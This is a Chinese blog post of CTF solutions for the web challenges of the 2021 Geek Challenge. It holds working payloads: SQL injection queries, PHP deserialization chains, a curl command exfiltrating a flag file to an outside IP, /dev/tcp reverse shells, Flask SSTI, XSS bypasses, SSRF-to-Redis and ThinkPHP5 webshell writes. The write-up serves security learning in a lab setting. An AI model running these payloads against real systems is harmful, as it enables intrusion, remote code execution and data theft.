当前位置:首页 » 《随便一记》 » 正文

2021极客大挑战web部分wp_bmth666的博客

19 人参与  2022年04月05日 10:18  分类 : 《随便一记》  评论

点击全文阅读


Dark

看到url:http://c6h35nlkeoew5vzcpsacsidbip2ezotsnj6sywn7znkdtrbsqkexa7yd.onion/
发现后缀为.onion,为洋葱,下载后使用洋葱游览器访问

Welcome2021

查看源码发现

那么抓包使用WELCOME请求方式访问

访问f1111aaaggg9.php

得到flag

babysql

简单的sql注入,直接使用sqlmap即可,也可以联合注入

1' union select 1,2,3,4#


发现注入点为1,2
直接获取数据库

-1' union select 1,(select group_concat(schema_name) from information_schema.schemata),3,4#


发现数据库flag,那么读取一下表

-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='flag'),3,4#


得到表fllag,那么读一下列

-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='flag' and table_name='fllag'),3,4#


最后读取即可:

-1' union select 1,(select group_concat(fllllllag,wlz) from flag.fllag),3,4#

anothersql

发现回显都是

很明显的布尔盲注,过滤了:

mid,substr  可以用left或right绕过
<,>  用=
if   用case when绕过

然后写出脚本,得到flag

import requests
import string

url = "http://47.100.242.70:4003/check.php"

flag = ''
string= '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_,@{}'
for x in range(1, 100):
    for i in string:
        #true
        #payload = "1' or case when (left((database()),%d)='%s') then 1 else 0 end#" % (x, flag + i)
        #syclover
        #payload = "1' or case when (left((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d)='%s') then 1 else 0 end#" % (x, flag + i)
        #id,uname,pwd,flag
        #payload = "1' or case when (left((select group_concat(column_name) from information_schema.columns where table_name='syclover'),%d)='%s') then 1 else 0 end#" % (x, flag + i)
        payload = "1' or case when (left((select flag from syclover),%d)='%s') then 1 else 0 end#" % (x, flag + i)

        data = {'uname':payload,
        'pwd':'123456',
        'wp-submit':'登录'
        }
        #print(payload)
        response = requests.post(url, data=data)
        if b'your uname:admin adn your pwd:123456' in response.content:
            flag += i
            print(flag)
            break

babyPOP

简单的pop链,给出来源码

<?php
class a {
    public static $Do_u_like_JiaRan = false;
    public static $Do_u_like_AFKL = false;
}

class b {
    private $i_want_2_listen_2_MaoZhongDu;
    public function __toString()
    {
        if (a::$Do_u_like_AFKL) {
            return exec($this->i_want_2_listen_2_MaoZhongDu);
        } else {
            throw new Error("Noooooooooooooooooooooooooooo!!!!!!!!!!!!!!!!");
        }
    }
}

class c {
    public function __wakeup()
    {
        a::$Do_u_like_JiaRan = true;
    }
}

class d {
    public function __invoke()
    {
        a::$Do_u_like_AFKL = true;
        return "关注嘉然," . $this->value;
    }
}

class e {
    public function __destruct()
    {
        if (a::$Do_u_like_JiaRan) {
            ($this->afkl)();
        } else {
            throw new Error("Noooooooooooooooooooooooooooo!!!!!!!!!!!!!!!!");
        }
    }
}

if (isset($_GET['data'])) {
    unserialize(base64_decode($_GET['data']));
} else {
    highlight_file(__FILE__);
} 

发现最后调用到类b的exec,那么就需要调用__toString()->需要返回一个字符串,看到类d,发现__invoke->需要使用调用函数的方式调用一个对象,看到类e,那么就需要将Do_u_like_AFKL变为true->调用类c
但从类c到类e的过程中没有桥梁,我们需要自定义一个变量来完成,然后将这个变量的对象指向类e

<?php
class a {
    public static $Do_u_like_JiaRan = false;
    public static $Do_u_like_AFKL = false;
}

class b {
    private $i_want_2_listen_2_MaoZhongDu = 'curl 110.42.134.160:6666/`cat /flag|base64`';
    public function __toString()
    {
        if (a::$Do_u_like_AFKL) {
            return exec($this->i_want_2_listen_2_MaoZhongDu);
        } else {
            throw new Error("Noooooooooooooooooooooooooooo!!!!!!!!!!!!!!!!");
        }
    }
}

class c {
    public $a;
    public function __construct()
    {
        $this->a = new e();
    }
    public function __wakeup()
    {
        a::$Do_u_like_JiaRan = true;
    }
}

class d {
    public function __invoke()
    {
        a::$Do_u_like_AFKL = true;
        return "关注嘉然," . $this->value;
    }
}

class e {
    public function __destruct()
    {
        if (a::$Do_u_like_JiaRan) {
            ($this->afkl)();
        } else {
            throw new Error("Noooooooooooooooooooooooooooo!!!!!!!!!!!!!!!!");
        }
    }
}

$n = new c();
$n->a->afkl = new d();
$n->a->afkl->value = new b();
$m = serialize($n);
var_dump($m);
echo(base64_encode($m));


由于exec没有回显,又不存在权限创建文件,需要我们使用dnslog外带命令了:

curl 110.42.134.160:6666/`cat /flag|base64`


解码得到flag

where_is_my_FUMO

给出了文章:Linux 反弹shell(二)反弹shell的本质
给出了源码:

<?php
function chijou_kega_no_junnka($str) {
    $black_list = [">", ";", "|", "{", "}", "/", " "];
    return str_replace($black_list, "", $str);
}

if (isset($_GET['DATA'])) {
    $data = $_GET['DATA'];
    $addr = chijou_kega_no_junnka($data['ADDR']);
    $port = chijou_kega_no_junnka($data['PORT']);
    exec("bash -c \"bash -i < /dev/tcp/$addr/$port\"");
} else {
    highlight_file(__FILE__);
}

一开始尝试绕过,无果,后来测试了好久才发现可以连上去之后反弹shell,属实sb了

然后监听端口,反弹shell

bash -i >& /dev/tcp/110.42.134.160/2333 0>&1


最后需要下载flag.png到服务器,这里就需要文章中的内容了

cat flag.png > /dev/tcp/110.42.134.160/6666

然后监听端口输出到文件中,nc -lvnp 6666 > flag.png

得到flag

babyphp

右键查看源码得到提示robots.txt


访问得到源码:

<?php
function ssrf_me($url){
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        curl_close($ch);
        echo $output;
}

if(isset($_GET['url'])){
    ssrf_me($_GET['url']);
}
else{
    highlight_file(__FILE__);
        echo "<!-- 有没有一种可能,flag在根目录 -->";
} 

简单的ssrf,直接file:///flag

babyPy

提示是flask ssti,那直接掏出payload

#文件读取
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/flag','r').read() }}{% endif %}{% endfor %}
#命令执行
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('cat /flag').read()") }}{% endif %}{% endfor %}

蜜雪冰城甜蜜蜜

发现需要点出第九号饮料,并且看到js

/*
 * 生成签名
 * @params  待签名的json数据
 * @secret  密钥字符串
 */
function makeSign(params, secret){
    var ksort = Object.keys(params).sort();
    var str = '';
    for(var ki in ksort){ 
    str += ksort[ki] + '=' + params[ksort[ki]] + '&'; 
    }

    str += 'secret=' + secret;
    var token = hex_md5(str).toUpperCase();
    return rsa_sign(token);
}

/*
 * rsa加密token
 */
function rsa_sign(token){
     var pubkey='-----BEGIN PUBLIC KEY-----';
    pubkey+='MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDAbfx4VggVVpcfCjzQ+nEiJ2DL';
    pubkey+='nRg3e2QdDf/m/qMvtqXi4xhwvbpHfaX46CzQznU8l9NJtF28pTSZSKnE/791MJfV';
    pubkey+='nucVcJcxRAEcpPprb8X3hfdxKEEYjOPAuVseewmO5cM+x7zi9FWbZ89uOp5sxjMn';
    pubkey+='lVjDaIczKTRx+7vn2wIDAQAB';
    pubkey+='-----END PUBLIC KEY-----';
    // 利用公钥加密
    var encrypt = new JSEncrypt();
    encrypt.setPublicKey(pubkey);
    return encrypt.encrypt(token);
}

/*
 * 获取时间戳
 */
function get_time(){
    var d = new Date();
    var time = d.getTime()/1000;
    return parseInt(time);
}

//secret密钥
var secret = 'e10adc3949ba59abbe56e057f20f883e';

$("[href='#']").click(function(){

    var params = {};
    console.log(123);
    
    params.id = $(this).attr("id");
    params.timestamp = get_time();
    params.fake_flag= 'SYC{lingze_find_a_girlfriend}';
    params.sign = makeSign(params, secret);
    $.ajax({
        url : "http://106.55.154.252:8083/sign.php",
        data : params,
        type:'post',
        success:function(msg){
            $('#text').html(msg);
            alert(msg);
        },
        async:false

    });

})

直接新命名一个id为9的即可,放入控制台运行即可

var flag = {};
flag.id = 9;
flag.timestamp = get_time();
flag.fake_flag= 'SYC{lingze_find_a_girlfriend}';
flag.sign = makeSign(flag, secret);
    $.ajax({
        url : "http://106.55.154.252:8083/sign.php",
        data : flag,
        type:'post',
        success:function(msg){
            $('#text').html(msg);
            alert(msg);
        },
        async:false

    });

雷克雅未克

需要修改XFF头为5.23.95.255,这里推荐一个工具

然后发现需要经纬度需要一样,在存储(cookie)那里加上x和y即可,64.963943,-19.02116

为jsfuck,最后控制台运行得到flag

人民艺术家

随便登录发现

那么使用他给的账号密码登录吧,发现请求头多了JWT

拿去解密发现为HS256加密

需要知道密钥,那么盲猜弱密码,使用c-jwt-cracker进行爆破

得到密钥1234,那么修改好数据重新访问

这里我使用postman进行访问,也可以抓包增加JWT头进行访问

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0aW1lIjoiMjAxOSIsIm5hbWUiOiJhZG1pbiJ9.WInN2vLaV6NMMsfu-6-foUOZ8trV9Ll2RsZ_gGd8Idk


访问得到flag

babyxss

<script>
function check(input){input = input.replace(/alert/,'');return '<script>console.log("'+input+'");</script>';}
</script>

发现存在过滤字符alert,会将字符置空,那么直接双写绕过,还有绕过技巧:

</script><script>alalertert(1)</script>
</script><svg/onload=setTimeout('ale'+'rt(1)',0)>
</script><script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>

Baby_PHP_Black_Magic_Enlightenment

给出了源码:

 <?php
echo "PHP is the best Language <br/>";
echo "Have you ever heard about PHP Black Magic<br/>";
error_reporting(0);
$temp = $_GET['password'];
is_numeric($temp)?die("no way"):NULL;    
if($temp>9999){
    echo file_get_contents('./2.php');
    echo "How's that possible";
} 
highlight_file(__FILE__);
//Art is long, but life is short. So I use PHP.
//I think It`s So useful that DiaoRen Said;
//why not they use their vps !!!
//BBTZ le jiarenmen
?> 

发现判断is_numeric($temp)$temp>9999,要是temp不是数字但是大于9999,很明显弱比较
?password=10000a

得到baby_magic.php,进入下一关

<?php
error_reporting(0);

$flag=getenv('flag');
if (isset($_GET['user']) and isset($_GET['pass'])) 
{
    if ($_GET['user'] == $_GET['pass'])
        echo 'no no no no way for you to do so.';
    else if (sha1($_GET['user']) === sha1($_GET['pass']))
      die('G1ve u the flag'.$flag);
    else
        echo 'not right';
}
else
    echo 'Just g1ve it a try.';
highlight_file(__FILE__);
?>

很明显sha1的数组绕过,直接传入数组就可以了?user[]=1&pass[]=2

baby_revenge.php,进入下一关发现:

<?php
error_reporting(0);

$flag=getenv('fllag');
if (isset($_GET['user']) and isset($_GET['pass'])) 
{
    if ($_GET['user'] == $_GET['pass'])
        echo 'no no no no way for you to do so.';
    else if(is_array($_GET['user']) || is_array($_GET['pass']))
        die('There is no way you can sneak me, young man!');
    else if (sha1($_GET['user']) === sha1($_GET['pass'])){
      echo "Hanzo:It is impossible only the tribe of Shimada can controle the dragon<br/>";
      die('Genji:We will see again Hanzo'.$flag.'<br/>');
    }
    else
        echo 'Wrong!';
}else
    echo 'Just G1ve it a try.';
highlight_file(__FILE__);
?> 

过滤了数组,那么需要sha1碰撞了,正好有一篇文章:关于SHA1碰撞——比较两个binary的不同之处

?user=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01%7FF%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2V%0BE%CAg%D6%88%C7%F8K%8CLy%1F%E0%2B%3D%F6%14%F8m%B1i%09%01%C5kE%C1S%0A%FE%DF%B7%608%E9rr/%E7%ADr%8F%0EI%04%E0F%C20W%0F%E9%D4%13%98%AB%E1.%F5%BC%94%2B%E35B%A4%80-%98%B5%D7%0F%2A3.%C3%7F%AC5%14%E7M%DC%0F%2C%C1%A8t%CD%0Cx0Z%21Vda0%97%89%60k%D0%BF%3F%98%CD%A8%04F%29%A1
&pass=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01sF%DC%91f%B6%7E%11%8F%02%9A%B6%21%B2V%0F%F9%CAg%CC%A8%C7%F8%5B%A8Ly%03%0C%2B%3D%E2%18%F8m%B3%A9%09%01%D5%DFE%C1O%26%FE%DF%B3%DC8%E9j%C2/%E7%BDr%8F%0EE%BC%E0F%D2%3CW%0F%EB%14%13%98%BBU.%F5%A0%A8%2B%E31%FE%A4%807%B8%B5%D7%1F%0E3.%DF%93%AC5%00%EBM%DC%0D%EC%C1%A8dy%0Cx%2Cv%21V%60%DD0%97%91%D0k%D0%AF%3F%98%CD%A4%BCF%29%B1


得到here_s_the_flag.php,最后一关

<?php
$flag=getenv('flllllllllag');
if(strstr("Longlone",$_GET['id'])) {
  echo("no no no!<br>");
  exit();
}

$_GET['id'] = urldecode($_GET['id']);
if($_GET['id'] === "Longlone")
{
  
  echo "flag: $flag";
}
highlight_file(__FILE__);
?> 

由于urldecode会解码一次,GET传参会解码一次,那么将Longloneurl编码两次就可以绕过了
?id=%254c%256f%256e%2567%256c%256f%256e%2565

givemeyourlove

手把手带你用 SSRF 打穿内网
访问发现,并且给出了一串数字123123

<?php
// I hear her lucky number is 123123
highlight_file(__FILE__);
$ch = curl_init();
$url=$_GET['url'];
if(preg_match("/^https|dict|file:/is",$url))
{
    echo 'NO NO HACKING!!';
    die();
}
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_exec($ch);   
curl_close($ch);  
?> 

题目提示redis,那么肯定是ssrf打redis了,由于存在密码,使用gopher-redis-auth

由于是GET传参,将生成的payload url编码一次得到:

gopher%3A%2F%2F127.0.0.1%3A6379%2F_%252A2%250D%250A%25244%250D%250AAUTH%250D%250A%25246%250D%250A123123%250D%250A%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252434%250D%250A%250A%250A%253C%253Fphp%2520system%2528%2524_GET%255B%2527cmd%2527%255D%2529%253B%2520%253F%253E%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252413%250D%250A%2Fvar%2Fwww%2Fhtml%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25249%250D%250Ashell.php%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A%250A

传入发现成功写入shell,最后读取flag即可

SoEzUnser

 <?php

class fxxk{
    public $par0;
    public $par1;
    public $par2;
    public $par3;
    public $kelasi;
    
    public function __construct($par0,$par1,$par2,$par3){
        $this -> par0 = $par0;
        $this -> par1 = $par1;
        $this -> par2 = $par2;
        $this -> par3 = $par3;
    }
    public function newOne(){
        $this -> kelasi = new $this -> par0($this -> par1,$this -> par2);
    }

    public function wuhu(){
        echo('syclover    !'.$this -> kelasi.'     yyds');
    }
    
    public function qifei(){
        //$ser = serialize($this -> kelasi);
        //$unser = unserialize($ser);
        $this -> kelasi -> juts_a_function();
    }
    
    public function __destruct(){
        if(!empty($this -> par0) && (isset($this -> par1) || isset($this -> par2))){
            $this -> newOne();
            if($this -> par3 == 'unser'){
                $this -> qifei();
            }
            else{
                $this -> wuhu();
            }
        }
    }

    public function __wakeup(){
        @include_once($this -> par2.'hint.php');
    }
}
highlight_file(__FILE__);
$hack = $_GET['hack'];
unserialize($hack); 

调用了之前学过的原生态一起出的一个题,参考文章:PHP 原生类的利用小结
首先先读取一下hint.php:

$a= new fxxk();
$a->par2 = 'php://filter/convert.base64-encode/resource=';
$b = serialize($a);
echo(urlencode($b));


使用GlobIterator类读取一下目录文件

$a= new fxxk();
$a->par0 = 'GlobIterator';
$a->par1 = 'glob://*';
$b = serialize($a);
echo(urlencode($b));
?hack=O%3A4%3A"fxxk"%3A5%3A{s%3A4%3A"par0"%3Bs%3A12%3A"GlobIterator"%3Bs%3A4%3A"par1"%3Bs%3A8%3A"glob%3A%2F%2F*"%3Bs%3A4%3A"par2"%3BN%3Bs%3A4%3A"par3"%3BN%3Bs%3A6%3A"kelasi"%3BN%3B}


得到目录aaaaaaaaaaafxadwagaefae
接着往下翻发现

$a= new fxxk();
$a->par0 = 'GlobIterator';
$a->par1 = 'glob://aaaaaaaaaaafxadwagaefae/*';
$b = serialize($a);
echo(urlencode($b));
?hack=O%3A4%3A"fxxk"%3A5%3A{s%3A4%3A"par0"%3Bs%3A12%3A"GlobIterator"%3Bs%3A4%3A"par1"%3Bs%3A32%3A"glob%3A%2F%2Faaaaaaaaaaafxadwagaefae%2F*"%3Bs%3A4%3A"par2"%3BN%3Bs%3A4%3A"par3"%3BN%3Bs%3A6%3A"kelasi"%3BN%3B}

非预期

那么需要使用SplFileObject读取了,这里可以使用php伪协议进行base64加密

$a= new fxxk();
$a->par0 = 'SplFileObject';
$a->par1 = 'php://filter/convert.base64-encode/resource=aaaaaaaaaaafxadwagaefae/UcantGuess.php';
$a->par2 = 'rb';
$b = serialize($a);
echo(urlencode($b));
O%3A4%3A"fxxk"%3A5%3A{s%3A4%3A"par0"%3Bs%3A13%3A"SplFileObject"%3Bs%3A4%3A"par1"%3Bs%3A82%3A"php%3A%2F%2Ffilter%2Fconvert.base64-encode%2Fresource%3Daaaaaaaaaaafxadwagaefae%2FUcantGuess.php"%3Bs%3A4%3A"par2"%3Bs%3A2%3A"rb"%3Bs%3A4%3A"par3"%3BN%3Bs%3A6%3A"kelasi"%3BN%3B}


直接可以获取源码了,得到flag


这里其实是非预期解出来的,实际上需要使用SoapClient

预期

根据提示,需要post传参:message=iwantflag&url=vps,然后必须从内网的127.0.0.1发送,很明显使用ssrf
使用SoapClient类,然后触发__call,调用ssrf来让127.0.0.1发送请求包,最后vps接收flag

$a= new fxxk();
$target = 'http://127.0.0.1/unserbucket/aaaaaaaaaaafxadwagaefae/UcantGuess.php';
$post_data = 'message=iwantflag&url=http://110.42.134.160:8080';

$a->par0 = 'SoapClient';
$a->par1 = null;

$a->par2 = array('location' => $target,'user_agent'=>'bmth^^X-Forwarded-For:127.0.0.1^^Content-Type: application/x-www-form-urlencoded'.'^^Content-Length: '. (string)strlen($post_data).'^^^^'.$post_data,'uri'=>'http://127.0.0.1');
$a->par3 = 'unser';
$b = serialize($a);
$b = str_replace('^^',"\r\n",$b);
echo(urlencode($b));
O%3A4%3A%22fxxk%22%3A5%3A%7Bs%3A4%3A%22par0%22%3Bs%3A10%3A%22SoapClient%22%3Bs%3A4%3A%22par1%22%3BN%3Bs%3A4%3A%22par2%22%3Ba%3A3%3A%7Bs%3A8%3A%22location%22%3Bs%3A67%3A%22http%3A%2F%2F127.0.0.1%2Funserbucket%2Faaaaaaaaaaafxadwagaefae%2FUcantGuess.php%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A152%3A%22bmth%0D%0AX-Forwarded-For%3A127.0.0.1%0D%0AContent-Type%3A+application%2Fx-www-form-urlencoded%0D%0AContent-Length%3A+48%0D%0A%0D%0Amessage%3Diwantflag%26url%3Dhttp%3A%2F%2F110.42.134.160%3A8080%22%3Bs%3A3%3A%22uri%22%3Bs%3A16%3A%22http%3A%2F%2F127.0.0.1%22%3B%7Ds%3A4%3A%22par3%22%3Bs%3A5%3A%22unser%22%3Bs%3A6%3A%22kelasi%22%3BN%3B%7D

成全

发现是thinkphp5,直接使用payload试一下:

?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1


发现存在disable_functions,过滤了所有的可执行命令的函数,尝试写文件发现当前目录无法写,尝试/tmp目录下

?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=/tmp/shell.php&vars[1][]=<?php @eval($_POST[0]);?>

最后通过包含来连接蚁剑

?s=index/\think\Config/load&file=../../../../tmp/shell.php

得到flag

没做出来的题目

期末不挂科就算成功

查看源码发现一个debug.php,访问

发现是php伪协议,/debug.php?file=php://filter/convert.base64-encode/resource=debug.php,读取一下
debug.php:

<?php

    echo "<h1>快去学习PHP伪协议</h1>";
	error_reporting(0);
	$file=$_GET['file'];
	if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
		echo "NO!!!";
		exit();
	}
	include($file); 

?>

index.php:

<?php
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $_GET['url']);
#curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
#curl_setopt($ch, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);
curl_exec($ch);
curl_close($ch);
//你当前位于学校172.17.0.0/24网段下 其实还有台机子里面可以修改成绩 我偷偷告诉你password是123456,name是admin,//result必须要改成60 不然学校会查的!!!
?>

发现是ssrf,爆破一下,发现内网为http://172.17.0.7/

noobPHP

给出了www.zip,审计一下,看到AdminController.php:
我们要使roles中有ROLE_ADMIN,但注册的时候roles只是为ROLE_USER,那么就需要创建

看到UserController.php:

发现传入数组的代码过滤的不一样,肯定有问题,分析发现

array_unshift($get_roles, 'ROLE_USER');

那么我们传入?r[0]=ROLE_SUPERADMIN&r[1]=ROLE_ADMIN变为:

然后进行

unset($get_roles[$i]);
$get_roles=array_values($get_roles);


看到当i=1的时候会unset掉我们传入的ROLE_SUPERADMIN,然后被返回的数组将使用数值键,从0开始且以1递增,下一个就直接是i=2了,直接绕过了ROLE_ADMIN


接下来就是

if (preg_match("/[a-zA-Z]|\!|\@|\#|\%|\^|\&|\*|\:|\||\'\"|\`|\~|\\|\||\[|]/",$code)) {
            new Response('Wow,not this🤡');die();
        }
        eval($code);

发现过滤了字母、取反、异或、单双引号、中括号等,但发现没有过滤数字、小括号、分号和加号,以前看过RCTF的数字getshell:https://nop-sw.github.io/wiki/wp/RCTF/

1/0 返回 INF //0为除数
0/0 返回 NAN

那么自增,可以构造任意字符串

<?php
$a = '$_ = ((0/0).(0)){1};$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$____.=$__;$__=$_;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$___ = $_;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$_____ .= $___;$___ = $_;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$_____ .= $___;$___ = $_;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$_____ .= $___;$___ = $_;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$_____ .= $___;$___ = $_;$___++;$___++;$___++;$___++;$_____ .= $___;$___ = $_;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$_____ .= $___;$_____($____(){0});'; //SYSTEM(GETALLHEADERS(){0})
echo(urlencode($a));


这里我上传npc,然后建立socks5代理,连接上172.20.0.4的3306端口,但发现读写的权限不够,不能udf提权,换一个思路
然后又发现172.20.0.1是宝塔的站,但没啥思路,80端口啥都没有,扫描端口发现存在8002,访问,发现为ThinkPHP V5.0.10

breakout

给出了源码

 <?php
highlight_file(__FILE__);
// 这些奇怪的符号是什么呢?字符串之间还能异或的吗?
$a = $_POST['v'] ^ '!-__)^';
// ctf常见的验证码哦!纯数字呢
if (substr(md5($_POST['auth']),0,6) == "666666") {
    $a($_POST['code']);
} 

首先要和!-__)^异或,那么尝试生成system,运行下面代码之后找到一个字符串:rt,+l3

<?php
$a = '~!@#$%^&*()_+\|/?.,<>`-={}[]1234567890abcderfhijklmnopqrst';
for($i = 0;$i<strlen($a);$i++){
    for($j = 0;$j<strlen($a);$j++){
        if (ord($a[$i]^$a[$j])>64 && ord($a[$i]^$a[$j])<91){
            echo     $a[$i]. ' xor ' .$a[$j]. ' is ';
            echo  chr(ord($a[$i]^$a[$j])). ' ';
            echo  ord($a[$i]^$a[$j]);
            echo "\n";
        }elseif (ord($a[$i]^$a[$j])>96 && ord($a[$i]^$a[$j])<122){
            echo     $a[$i]. ' xor ' .$a[$j]. ' is ';
            echo   chr(ord($a[$i]^$a[$j])). ' ';
            echo    '  ' .ord($a[$i]^$a[$j]);
            echo "\n";
        }
    }
}


然后提示全数字,并且md5前六位为666666,进行爆破

import hashlib

for i in range(1, 100000001):
    s = hashlib.md5(str(i).encode("UTF-8")).hexdigest()[0:6]
    if s == "666666":
        print(i)
        break

得到数字:3185471


点击全文阅读


本文链接:http://zhangshiyu.com/post/37352.html

发现  出了  绕过  
<< 上一篇 下一篇 >>

  • 评论(0)
  • 赞助本站

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

关于我们 | 我要投稿 | 免责申明

Copyright © 2020-2022 ZhangShiYu.com Rights Reserved.豫ICP备2022013469号-1